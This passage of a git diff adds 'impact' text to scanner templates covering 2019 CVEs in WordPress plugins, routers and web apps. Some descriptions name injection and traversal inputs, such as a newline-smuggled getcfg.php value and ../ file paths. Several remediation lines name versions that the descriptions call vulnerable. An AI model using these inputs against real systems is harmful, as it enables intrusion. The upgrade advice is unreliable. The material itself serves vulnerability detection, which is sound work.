diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index b67b7f83e9..83a29f051e 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a version of L-Soft LISTSERV that is higher than 16.5-2018a to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 8eda25daa2..8b51f14ca6 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -6,6 +6,8 @@ info: severity: high description: | rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users." + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. remediation: | Upgrade Webmin to version 1.920 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index ec9fca3d06..fb88f0789a 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo,dhiyaneshDk severity: medium description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the My Calendar plugin (>= 3.1.10) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index b4f5edeb7c..a95eed4a50 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index c17e9e6065..ecb0bb760e 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and remote code execution. remediation: | Update to the latest version of the Woody Ad Snippets plugin (2.2.5) or apply the vendor-provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 67616c2383..60febcc27b 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI. + impact: | + An attacker can obtain sensitive information such as passwords, leading to unauthorized access. remediation: | Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index ebe65a1d44..2a63ef67ef 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update WordPress Download Manager plugin to version 2.9.94 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 9fa79509d7..b3ecd630a2 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 1793fdda86..109c71f6aa 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information. remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP. reference: - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 87c51b1c7a..dad18be591 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Upgrade to a patched version of PilusCart (>=1.4.2) or apply the vendor-supplied patch to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index a6e6f96ae8..0964a9489e 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. remediation: | Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch. reference: diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index 072e83a228..baae178662 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code. + impact: | + An attacker can exploit this vulnerability to discover sensitive credentials. remediation: | Update the ifw8 Router ROM to a version that is not affected by CVE-2019-16313. reference: diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 787c95223f..ecd8675f50 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of WordPress API Bearer Auth plugin (20190907 or later) to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 46f76f2c51..4ffe97e1af 100644 --- a/http/cves/2019/CVE-2019-16525.yaml 
+++ b/http/cves/2019/CVE-2019-16525.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Checklist plugin (1.1.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index 47893c9fbc..dfb6a7a118 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Cisco has released firmware updates that address this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 9f076dfad9..6ff88b4178 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected system. remediation: | Upgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index 5f3451e227..8081dc381a 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Upgrade vBulletin to a version that is not affected by CVE-2019-16759. reference: diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index 371fa24352..ca50e34521 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to complete compromise of the device and the network it is connected to. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index b38290bacf..477109b5e5 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 452579e443..059c85c7b2 100644 
--- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or data leakage. remediation: | Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index cd74bd299a..88b7485233 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 191bd7d6f5..3e06b60a4c 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml 
@@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 150568170a..f0606f5843 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Yachtcontrol Webapplication 1.0 makes it possible to perform direct operating system commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 67535f5850..3eb4db20df 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml 
@@ -5,6 +5,8 @@ info: author: harshbothra_ severity: critical description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application. remediation: | Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index fc4f549c29..9f35502a1f 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -6,6 +6,8 @@ info: severity: high description: | MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 7319970a5f..d20e7c9e34 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. + impact: | + An attacker can gain unauthorized access to the Jfrog Artifactory instance. remediation: | Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one. reference: diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index 8a6121338d..cf7c8bf5ae 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and credentials. remediation: | Apply the latest firmware update provided by D-Link to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index ff76f21cb2..f5c134ed96 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1&name=../. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including system files and credentials. remediation: | Upgrade Jiangnan Online Judge to a patched version or apply the necessary security patches to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 15c6832f31..f10482146f 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,madrobot severity: high description: Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user). + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Apache Solr (8.4.0 or later) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 6abec75f2e..23365a84cf 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file"). + impact: | + Unauthenticated attackers can gain administrative access to the WordPress site. remediation: | Update Popup-Maker plugin to version 1.8.12 or later. reference: diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 0623bb2b0e..fbe2d36a08 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. + impact: | + An attacker can bypass authentication and gain unauthorized access to the ThinVNC application. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index c391a13b40..e1beb43d7a 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 09fa772cd7..b5e6bf55ab 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure. remediation: | Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index fd9799d916..382e316ef0 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SECUDOS DOMOS before 5.6 allows local file inclusion via the log module. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest patch or update to a version that is not affected by this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 09704a49b5..3a8f82d94f 100644 
--- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -5,6 +5,8 @@ info: author: idealphase severity: critical description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + impact: | + An attacker can exploit this vulnerability to reset the admin password and gain unauthorized access to the Strapi CMS admin panel. remediation: | Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index ec442c5fd8..5299d57c65 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the affected device, leading to unauthorized access and potential data leakage. remediation: | Apply the latest firmware update provided by Allied Telesis to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index 37e513735a..f6b06e0f82 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. reference: - https://seclists.org/bugtraq/2019/Nov/23 diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 6d6f9b021b..d014596225 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the router. remediation: | Apply the latest firmware update provided by Cisco to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index a42be1d187..356e6cc2e9 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Hero Maps Premium plugin (>=2.2.2) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 1aef5731d3..8c163e0953 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 7a29dfff3c..950cfe74ef 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the necessary patches or updates provided by Cisco to fix the open redirect vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 01474400e2..f04bd59e6c 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -5,6 +5,8 @@ info: author: organiccrap,geeknik severity: critical description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system. remediation: | Apply the necessary security patches provided by Citrix to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml index 5b69c5c114..6dd1606eaa 100644 --- a/http/cves/2019/CVE-2019-19824.yaml +++ b/http/cves/2019/CVE-2019-19824.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index c30a944fb2..536a6b1147 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code 